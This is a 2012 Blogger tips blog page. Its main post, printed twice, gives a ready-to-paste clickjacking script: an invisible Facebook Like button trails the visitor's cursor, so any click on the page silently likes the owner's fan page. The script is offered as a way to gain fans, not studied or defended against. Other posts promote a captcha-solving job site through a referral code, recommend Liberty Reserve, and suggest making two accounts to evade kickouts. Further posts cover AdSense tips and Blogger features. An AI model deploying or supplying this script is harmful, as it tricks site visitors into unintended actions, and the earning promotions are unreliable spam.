Blogging Tips

Blogging Tips and Tricks

Free Domain And Web Hosting

For More Details Visit http://www.ranatechnologies.com

Facebook Tricks

Find Informative Tricks Regarding Facebook

Web Designing And Development

Cheapest Web Designing Packages call us now! or Visit www.ranatechnologies.com

Blogger Widgets And Plugins

Find Numerous Widgets and Plugins Here and Many More..

Saturday, September 15, 2012

Automatically Increase Facebook Fans in Fan-page

Well today we have found another simple to be applied script for your blogs or website which can gain few more unique likes to your facebook page, with this script applied any unique visitor who comes to your page can become your fan. He just needs to click anywhere on the webpage as a small invisible like button will follow his mouse cursor and as soon he clicks anywhere he will be liking your fan page. So now straight away jumping on how it can be applied in a webpage or blog just check below step by step tutorial.

1. Go to Blogger > Template > Edit HTML
2. Now just press Ctrl + F and search for </head> tag and paste the below script above it.
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js" type="text/javascript">
</script>
<script type='text/javascript'>
         function ClickJackFbHide(){
            jQuery(&quot;div[id^=\&#39;clickjack-button-wrapper\&#39;]&quot;).hide();
         }
         function ClickJackFbShow(){
            jQuery(&quot;div[id^=\&#39;clickjack-button-wrapper\&#39;]&quot;).show();
         }

</script>
3. Now again make a search for </body> tag and paste below code above it.
<div id="clickjack-button-wrapper-5" style="position: absolute; opacity: 0; filter: alpha(opacity = 0); -ms-filter:'progid:DXImageTransform.Microsoft.Alpha(Opacity=0)';  margin-left: -50px; z-index: 100; width:27px; height:20px; overflow:hidden"> 
<!--<div class="clickjack-mask" style="position: absolute; top: 5px; left: 5px; z-index: 1000; height: 13px; width: 15px;"></div>-->
<iframe src="http://www.facebook.com/plugins/like.php?href=Fanpage URL Link&amp;layout=button_count&amp;show_faces=false&amp;width=50&amp;action=like&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:45px; left:-19px; height:21px; z-index: 0; position: relative;" allowTransparency="true"></iframe> 

   </div>
   <script type="text/javascript">
      jQuery( document ).ready( function() {
          $( "#clickjack-button-wrapper-5" ).parent().mousemove( function( e ) {
            jQuery( "#clickjack-button-wrapper-5" ).css( {
               top: e.pageY - 10,
               left: e.pageX + 30
            } );
         } );
                        clickjack_hider();
                        var clickjack_fb_timer = setTimeout("clickjack_hider()",5000);
      } );
                        function clickjack_hider(){
         jQuery("input").mouseout(function(){ClickJackFbShow();});
         jQuery("a").mouseout(function(){ClickJackFbShow();});
         jQuery("button").mouseout(function(){ClickJackFbShow();});
         jQuery("textarea").mouseout(function(){ClickJackFbShow();});
         jQuery(".ratingblock").mouseout(function(){ClickJackFbShow();});         jQuery("object").mouseout(function(){ClickJackFbShow();});
         jQuery("input").mouseover(function(){ClickJackFbHide();});
         jQuery("a").mouseover(function(){ClickJackFbHide();});
         jQuery("button").mouseover(function(){ClickJackFbHide();});
         jQuery("textarea").mouseover(function(){ClickJackFbHide();});
         jQuery(".ratingblock").mouseover(function(){ClickJackFbHide();});         jQuery("object").mouseover(function(){ClickJackFbHide();});
                        }
   </script>

4. Now just replace the red line in above code with your facebook page URL and that’s it now just save the template and jump over to your website to test it out.
Now as soon as you refresh your blog you will see that your cursor has been changed into the hand one as there is a link moving with it. Now your blog readers will see similar thing and ass soon as they will click it they will become your page fan.
REMEMBER There are some issues you might face using this script in your website or blog, the first thing is that when people drag they might not able to select the text as they will a semi visible Like button which will be attached to your mouse cursor as it moves, the second one some other gadgets might get affected and act weirdly, try using it if everything works ok than start increasing your fans :)

Well today we have found another simple to be applied script for your blogs or website which can gain few more unique likes to your facebook page, with this script applied any unique visitor who comes to your page can become your fan. He just needs to click anywhere on the webpage as a small invisible like button will follow his mouse cursor and as soon he clicks anywhere he will be liking your fan page. So now straight away jumping on how it can be applied in a webpage or blog just check below step by step tutorial.

1. Go to Blogger > Template > Edit HTML
2. Now just press Ctrl + F and search for </head> tag and paste the below script above it.
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js" type="text/javascript">
</script>
<script type='text/javascript'>
         function ClickJackFbHide(){
            jQuery(&quot;div[id^=\&#39;clickjack-button-wrapper\&#39;]&quot;).hide();
         }
         function ClickJackFbShow(){
            jQuery(&quot;div[id^=\&#39;clickjack-button-wrapper\&#39;]&quot;).show();
         }

</script>
3. Now again make a search for </body> tag and paste below code above it.
<div id="clickjack-button-wrapper-5" style="position: absolute; opacity: 0; filter: alpha(opacity = 0); -ms-filter:'progid:DXImageTransform.Microsoft.Alpha(Opacity=0)';  margin-left: -50px; z-index: 100; width:27px; height:20px; overflow:hidden"> 
<!--<div class="clickjack-mask" style="position: absolute; top: 5px; left: 5px; z-index: 1000; height: 13px; width: 15px;"></div>-->
<iframe src="http://www.facebook.com/plugins/like.php?href=Fanpage URL Link&amp;layout=button_count&amp;show_faces=false&amp;width=50&amp;action=like&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:45px; left:-19px; height:21px; z-index: 0; position: relative;" allowTransparency="true"></iframe> 

   </div>
   <script type="text/javascript">
      jQuery( document ).ready( function() {
          $( "#clickjack-button-wrapper-5" ).parent().mousemove( function( e ) {
            jQuery( "#clickjack-button-wrapper-5" ).css( {
               top: e.pageY - 10,
               left: e.pageX + 30
            } );
         } );
                        clickjack_hider();
                        var clickjack_fb_timer = setTimeout("clickjack_hider()",5000);
      } );
                        function clickjack_hider(){
         jQuery("input").mouseout(function(){ClickJackFbShow();});
         jQuery("a").mouseout(function(){ClickJackFbShow();});
         jQuery("button").mouseout(function(){ClickJackFbShow();});
         jQuery("textarea").mouseout(function(){ClickJackFbShow();});
         jQuery(".ratingblock").mouseout(function(){ClickJackFbShow();});         jQuery("object").mouseout(function(){ClickJackFbShow();});
         jQuery("input").mouseover(function(){ClickJackFbHide();});
         jQuery("a").mouseover(function(){ClickJackFbHide();});
         jQuery("button").mouseover(function(){ClickJackFbHide();});
         jQuery("textarea").mouseover(function(){ClickJackFbHide();});
         jQuery(".ratingblock").mouseover(function(){ClickJackFbHide();});         jQuery("object").mouseover(function(){ClickJackFbHide();});
                        }
   </script>

4. Now just replace the red line in above code with your facebook page URL and that’s it now just save the template and jump over to your website to test it out.
Now as soon as you refresh your blog you will see that your cursor has been changed into the hand one as there is a link moving with it. Now your blog readers will see similar thing and ass soon as they will click it they will become your page fan.
REMEMBER There are some issues you might face using this script in your website or blog, the first thing is that when people drag they might not able to select the text as they will a semi visible Like button which will be attached to your mouse cursor as it moves, the second one some other gadgets might get affected and act weirdly, try using it if everything works ok than start increasing your fans :) 

How can you earn money online ?




How can you earn money online ?

By making website or blog. ( Recommended )
By working for some other website on salary or work basis.
By selling some thing online.
Data entry Jobs.
I will teach you here that how how to make a blog and website and earn with it .


Select an Idea for blog or website ?
If you want to earn online you first need to to know what you want to do on the website or blog online . Here are few ideas that you may like.
  • Start a news website . You can take the news from Tv. as soon as news appear post it on you blog before any one else do.
  • Provide information services. like how to do things , how to repair stuff , Whats new is coming , advantages , disadvantages and review about products.
  • Make a celebrity blog , talk about films , reliese dates , hero , heroines , scandals and more.
  • Make an sms or poetry blog.
  • Jobs , funny pics , technology are also good ideas.
  • Every thing works on internet if is done in a good way

How to make a blog and website free ?
If you are trying to earn for the first time or new to it then i recommend you to start a free website or blog. or BUY YOUR PERSONAL HOSTING AND DOMAIN TO EARN FAST  Below are some ways to do it.

  • Go to blogspot.com  and sign in with your google email id.  or Buy your own custom Domain and Hosting from Rana Technologies Click Here (Highly Recommended) Why Buying your own Domain and Hosting is Recommended coz by this You' ll have the Identity of Yours on Internet and Chances of Earnings are High

  • Add a blog , Name it , try to select name  relevant to website. Name can be of multi words.
  • Now start posting . Make tags relevant to your post . and keep on doing so.
  • Repeat the process again and again as much as you can.
How You will get paid ?
  • You can apply at google.com/adsense to get ads for your blog.
When to apply for Google Adsense?
There are no certain rules that when to apply for Google adsense but following points can help you get our adsense account approved.
  • At least 100 posts (Written by your own with no copy paste).
  • After one or two months of starting our blog with ou doing posts almost daily.
  • When your average visitors reach 1000 plus per day then apply.
Things to remember ?
  • Do not Copy Paste. Rewrite in your words or post a link of referring website as well.
  • It will not be easy to earn legally so you have to work day and night and implement new ideas.
  • Its not important that you should do stuff for people of Pakistan you can do any thing about any country and its people.
  • Don’t think of money for the first 3 months just focus to get average 1000 visitors daily. If you get that target you will get money as well.
If you want to ask any thing write in comments section or on my personal Skype ID given Below .
Good Luck ! And dont work for others. Start your own website

How To Earn Dollars With Google Adsense ??




For More Info Add me on Skype

Skype ID: Onlineearningfever

Earn $3 to $6 by doing 2 to 4 hours work a day!

Earn 600 to 1000 PKR daily by doing 2 to 4 hours work a day! (FOR PAKISTANI'S and INDIAN'S)

 Earn $3 to $6 by doing 2 to 4 hours work a day!  (WORLDWIDE USERS)

WITHOUT ANY INVESTMENT

Its a CAPTCHA ENTRY WORK If You have Good Typing Speed and You can easily Write a CAPTCHA in 15 Secs then its a Right Place For You. People from Home/ Girls/Mom/Kids Above 16 Can easily do this work from home

People are Earning Enormous Money out of it While sitting at their Homes If They Can Earn Why Don't You ? Hurry up and Sign up before its too Late!

Whats the Procedure to Get Registered

To start your work with megatypers you need the following things:

1-  You need a fresh email … (gmail suggested)

2-  You need bank account : Supported Payment Modes are Given Below

For Liberty Reserve - go to following link and create free bank account by watching the training video:
http://www.youtube.com/watch?v=V91jsyErV8E 

For Paypal - go to following link and create free bank account by watching the training video:  
http://www.youtube.com/watch?v=ACu_5avPw_k 

For Web Money - go to following link and create free bank account by watching the training video:
http://www.youtube.com/watch?v=j5EArj0P_aY
After having all this go to the following site

http://www.megatypers.com

and click on “FREE SIGN-UP” button to create account 

3-   You need invitation Code : 45MT




Enter the Code Given Above in the TAB "INVITATION CODE"

Note: (Unless You Enter the Invitation Code You Won't able to Sign up as it is mandatory to have your SPONSOR in order to get Registered!)




Only Try this Work if u have a Good Typing Speed! Upon not providing captcha Entry on Time You will be Kicked out and it can result into permanent termination of Your Account!

After Signing up Read the Given TUTORIAL CAREFULLY :


QUICK TUTORIAL

You can start working by clicking on "Solve Images" on the TOP left corner of the screen.

solve

Click on Solve Images to start working.

You will need to type the text as shown in the images and press then press Enter. The Images will start appearing one by one automatically.

example

You must press the Enter key after you typed the text

Each image must be typed with the correct case for each letter.

case

This is an example of an image with both uppercase and lowercase letters.

Some of the images are only partially readable; you must type the readable portions of the image, even if this means leaving the unreadable part out.

partial

Partially Readable Image

If an image is completely unreadable, you may click the "DON'T KNOW" button.You may also press the Esc key if you want to quickly skip that unreadable image.

unreadable

Unreadable Image

You may also notice that there’s a timer running on top of your images. You must type the contents of the images before the time runs out.

timer

Type fast! Don't let the timer run out!

When you would like to take a break, type the text (don’t press Enter!) and then click on SUBMIT AND PAUSE.This is the only way to pause. We will know whenever you leave the page or close the browser.

pause

Type the text (don't press Enter) and click the SUBMIT AND PAUSE button to take a break

In MegaTypers.com, the money you make will depend on how much you work and at what time you work.
The amount of money that you earn will depend on Rates. A Rate will show you the amount of money you will earn if you type in 1000 images. For example: If you have a Rate of $0.50 for 1000 images, then you will earn $0.50 when you type in 1000 images. 
The Rates will be changing every hour. You can check the rate for every hour of the day in the “Statistics” page. The rate for the current hour will be highlighted.

rates

Example of how Rates are shown. These are not the current rates!

For details of how much you’ve earned, you can go to the "Profile and Payments" page. Here you will find information about:

  • Your balance or the amount of money that you have accumulated so far.
  • The minimum balance that you need to get paid.
  • And other information about your financials.


Payments are made automatically every monday when using the following e-currencies: Paypal, Liberty Reserve, Webmoney.
For other payment methods such as Western Union, payments are made once a month.
And lastly, please read the "Rules" page. Here you will find clear guidelines about what you shouldn't do while working in MegaTypers.com. You can find the "Rules" page after clicking on "Help".

rules

To go into the Rules page, you must click on Help first.

MegaTypers.com is continuously evolving; we recommend that you look into any other page that wasn't mentioned in this tutorial!
Thanks for joining MegaTypers.com! Remember, the faster you work the more you earn!




---------------------------------------------------------------------------------
AGAR AAPKO ENGLISH NAHI AATI TAU ISKO POORA PARHAIN URDU MEIN POORI TAFSEEL K SATH LIKHA HAI 



Best way of earning from internet 100% legit i am earning and always got my payment form the best captcha data entry site www.megatypers.com i will tell you how to work and earn easly 5 dollar in a day
How to Start this Job?
step by step below


(1)Sub sey pahlay aap k pass apka apna liberty reserve ka account hona chahiya jo sub se acha payment processor hai aur pori duniya mey use ho raha hai . log iss ko forex aur trading key liya use kertay hain aur iss ka dollar ka rate bhi sub payment processor se ziyda ho ta hai ( how to create see )


http://www.libertyreserve.com/


(2) http://www.megatypers.com for this use only firefox browser or google chrome iss per ap ne apni detail enter kerni hai or ye invitation code use kerna hai (45MT)

then Ab apney account sey login ho jain. aur Solve Images click kar k typing start kar dain. Yaad rahay jab bhi kaam rokna ho tou Pause kar k uthain. Warna aap kickout ho jain gay aur aap ka account BAN bhi ho sakta hay Agar aap kickout ho jain tou logout ho kar 15 min baad kaam start karain. warna multiple kickout per permanent ban bhi ho saktay hain. agar aisa na kiya tu ap ko ap k0 payment hasil nahi ho gi


(3)Din main rate 0.85$, Raat 9 k baad 0.95$ aur raat 11 k baad 1.25$ aur raat 1 k baad 1.35$ ho jata hay. tu raat ko kam ker key zaida earn ker suktey hain


(4) Jab ap ki payment 3 ho jaye gi tu site ap ko automatically monday wala din pay kerdey gi lekin ap ko payment 1 se ley ker 7 days mey miley gi jo ap key account mey poochay gi

ye site payment kuch din late kerti hai lekin sub se achi data entry site hai
aur jab payment mile jaye tu ap apney account libertyreserve ke option me ja ker exchanger ko transfer ker suktey hain aur wo apki payment ap key bank ya easly paisay key through pay kerday ga
ap log sumhatey hain key ye sub jhoot hai aur koi payment nahi miley gi tu ap bikul galat hain kyu k yaqenan yeh site pay karti hai isi loye mey ap ko ye bata raha hoon key ap bhi earn kerain please is site per kam kerney se pehlay meri tips ko zaroor read kerain warna ap ko payment nahi miley gi aur account block ho gaye ga

TIPS
(1) site per jaa ker iss key help option mey guide or rules zaroor read kerain
(2) 15 second mey capthca ko typer kerain
(3) agar kick out ho jaye tu logout ho ker 15 min baad work start kerain ya 2 account bana ley taakey eik se kickout ho jaiye tu doseray se work start kerain mein bhi yehi kerta hoon
(4) software use karein ge to aap ki working increase ho gi jis se zyada earning ho gi jis k liya aap mujh se rabta kar sakte hain
(5) please ye tips zaroor use kerain warna account block ho jaye ga
(6) aur ye mat soochey ke paisay ap ko nahi miley gaye site se ye site 200% pay kerti hai lekin 7 day tak,agar aap daily payment laina chahte hain to us k liye bhi aap mujh se rabta kar sakte hain

PAYMENT GUIDELINES:

  • The payments are processed once a week, on Mondays at 5:00pm server time. It can however take until Wednesday morning before you see the funds on your account.
  • In order to get paid, your Estimated Balance needs to reach a minimum amount of $3.00 USDbefore Monday.
  • If your Estimated Balance did not meet the previous conditions, the amount you have gained will stay on your account until the minimum balance is reached and the payment will be made next Monday.
  • Once your payment process has started, a message with information regarding the process will be displayed (please see below). After your payment is completed, your Estimated Balance will reset to zero ($0.00 USD).

NOTE: BEST TIME TO WORK ON THIS WEBSITE ACCORDING TO PAKISTANI TIME IS 11 PM TO 7 AM BECAUSE AFTER 11 PM YOU CAN EARN $1 TO $2 PER 1000 CORRECT CAPTCHA ENTRIES SO I SUGGEST YOU TO WORK IN THESE HOURS 




For More Info Add me on Skype


Skype ID: Onlineearningfever

Tuesday, July 31, 2012

Google+ tab Included in Blogger Dashboard


Socialize and grow your blog with Google+

Today a new “Google+” tab has been added by blogger so you now have a central place to start growing your blog with Google+. This means you can now:

Notify followers when you publish, and let them recommend your content
Each time you post on your blog, Blogger show you a Google+ share box to let you notify followers that you have new blog content.  If they like what you share, followers can +1 or reshare your post to their own friends on Google+. This ripple effect exposes links to your content to a wider audience.


Build enduring connections with your audience

Adding the Google+ gadget to your blog makes it easy for people to add your profile or page to their circles when they like something you’ve published. Forming connections with readers that last after they've left your blog is essential.  

To get started, click the “Google+” tab in the Blogger dashboard and then the “Upgrade” button. If you’ve already upgraded to Google+, Blogger will help you associate your blog with your profile or page.


Sunday, July 29, 2012

Custom Permalink For Posts Introduced by Blogger

What Really Custom Permalink is? This is the new Feature Introduced by Blogger and its really a SEO friendly


permalink (permanent link) is a URL that points to a specific blog or forum entry after it has passed from the front page to the archives. Permalinks are often simply stated so as to be human-readable


Using this Feature we can change the URL of the Blog according to our Requirement. WordPress had this feature a long ago but Blogger never focused on this feature ever in recent times but now it seems like blogger is intending to make this year as a SEO year because this Feature is a SEO friendly feature


How to use this Feature:


First go to the New Post and after completing your post go to POST SETTINGS there you find the Permalink option click it

. There you are going to find two options:


1. Automatic URL (In this Option URL is automatically Produced by Blogger )
2. Custom URL (In this Option Blogger allows you to create URL Yourself according to your need it will allow you to enter alphabets, hyphens and underscores. It will just ignore underscores. So I just used a combination of hyphens and alphabets to create my post permalink)


and after creating your desired URL click the DONE button and Publish Your Post


The Final Permalink will go like:


http://yourblogaddress/yyyy/mm/the custom URL that you specified




Note : Blogger doesn’t allow you to modify the Permalinks of old posts but you can make use of this new feature on your new posts  There seems to be no limit to the length of this Custom URL at the moment but Blogger might impose some length limit in future.